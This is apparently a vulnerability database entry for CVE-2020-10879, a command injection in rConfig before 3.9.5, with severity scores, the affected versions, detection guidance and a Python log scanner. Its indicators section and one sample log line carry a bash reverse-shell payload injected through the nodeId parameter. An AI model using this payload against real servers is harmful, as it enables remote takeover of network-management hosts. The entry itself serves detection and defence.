CVE-2020-10879
published 2020-03-23

Priority: P183, critical, 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 83.86% (99.7th percentile)

rConfig before 3.9.5 allows command injection by sending a crafted GET request to lib/crud/search.crud.php since the nodeId parameter is passed directly to the exec function without being escaped.

Affected

1 range
Vendor    Product    Version range    Fixed in
rconfig   rconfig    < 3.9.5          3.9.5

Detection & IOCs (extracted from sources)

url: /lib/crud/search.crud.php
path: /lib/crud/search.crud.php
command: || bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1 ;
  • Monitor GET requests to /lib/crud/search.crud.php where the 'nodeId' parameter contains shell metacharacters such as '||', '|', ';', '&', or bash redirection operators (e.g., '>&', '/dev/tcp/').
  • Detect URL-encoded bash reverse shell payloads in the 'nodeId' GET parameter of requests to search.crud.php, specifically patterns matching '%7C%7C+bash+-i' or '/dev/tcp/' after decoding.
  • Flag any rConfig instance running version 3.9.4 or earlier (prior to 3.9.5) as vulnerable to this unauthenticated-post-auth command injection.
  • The exploit was tested on CentOS 7 (1908); the bash reverse shell payload assumes a Linux target. Detection on Windows-based deployments may require different indicators.
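
The monitoring guidance above, sketched as a log check. This is an added example, not code from rConfig or from the sources this entry was extracted from. It assumes combined-format web access logs; the sample lines and addresses are constructed, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

TARGET_PATH = "/lib/crud/search.crud.php"
# Shell metacharacters and redirection markers named in the guidance above.
SUSPICIOUS = re.compile(r"\|\||[|;&]|>&|/dev/tcp/")
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation address ranges only).
SAMPLE_LOG = [
    '198.51.100.7 - - [23/Mar/2020:10:01:02 +0000] "GET /lib/crud/search.crud.php?nodeId=14 HTTP/1.1" 200 512',
    '203.0.113.9 - - [23/Mar/2020:10:05:40 +0000] "GET /lib/crud/search.crud.php?nodeId=%7C%7C+bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.0.2.1%2F4444+0%3E%261+%3B HTTP/1.1" 200 0',
    '198.51.100.7 - - [23/Mar/2020:10:06:11 +0000] "GET /index.php?nodeId=%3B HTTP/1.1" 200 90',
    '203.0.113.9 - - [23/Mar/2020:10:07:03 +0000] "GET /lib/crud/search.crud.php?nodeId=12%3B HTTP/1.1" 200 0',
]

def inspect_line(line):
    """Return (decoded nodeId, matched markers) for a suspicious line, else None."""
    m = REQUEST_RE.search(line)
    if not m or m.group("method") != "GET":
        return None
    url = urlsplit(m.group("target"))
    # endswith() also covers installs served from a sub-directory (assumption).
    if not url.path.endswith(TARGET_PATH):
        return None
    # parse_qs percent-decodes and maps '+' to a space, so URL-encoded
    # payloads are matched after decoding, as the guidance requires.
    for value in parse_qs(url.query, keep_blank_values=True).get("nodeId", []):
        hits = sorted(set(SUSPICIOUS.findall(value)))
        if hits:
            return value, hits
    return None

def scan(lines):
    """Return (line_number, client, decoded nodeId, markers) for each finding."""
    findings = []
    for n, line in enumerate(lines, 1):
        result = inspect_line(line)
        if result:
            findings.append((n, line.split(" ", 1)[0], *result))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A benign nodeId is numeric, so any hit on this path is worth triage; requests to other paths are ignored to keep the rule specific to this CVE.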

CVSS provenance

nvd   v3.1   9.8   CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd   v2.0   7.5   HIGH       AV:N/AC:L/Au:N/C:P/I:P/A:P